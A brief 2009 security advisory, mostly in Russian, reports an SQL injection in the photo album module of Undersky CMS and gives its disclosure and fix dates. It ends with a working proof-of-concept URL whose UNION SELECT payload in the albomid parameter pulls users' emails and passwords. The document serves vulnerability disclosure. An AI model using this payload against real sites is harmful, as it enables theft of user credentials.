[ONSEC-09-010] Undersky CMS SQL injection

2009-09-28T00:00:00
ID SECURITYVULNS:DOC:22529
Type securityvulns
Reporter Securityvulns
Modified 2009-09-28T00:00:00

Description

[ONSEC-09-010] Undersky CMS SQL injection Цель: Undersky CMS (http://www.undersky.ru) Тип: SQL инъекция Угроза: Высокая Дата обнаружения: 03.07.2009 Дата оповещения разработчика: 03.07.2009 Дата выхода исправления: 05.07.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group (onsec [dot] ru) Описание: Уязвимость существует в модуле фотоальбом. Отсутствие фильтрации символов в параметре albomid позволяет злоумышленнику осуществить произвольный SQL запрос и получить результат. Например, можно узнать личные данные пользователей.

http://demo.undersky.ru/foto.html? albomid=1+AND+1=2+UNION+SELECT+1,email,3, password,5,6,7,8,9,10,11,12,13,14,15,16,17 +FROM+users&p=1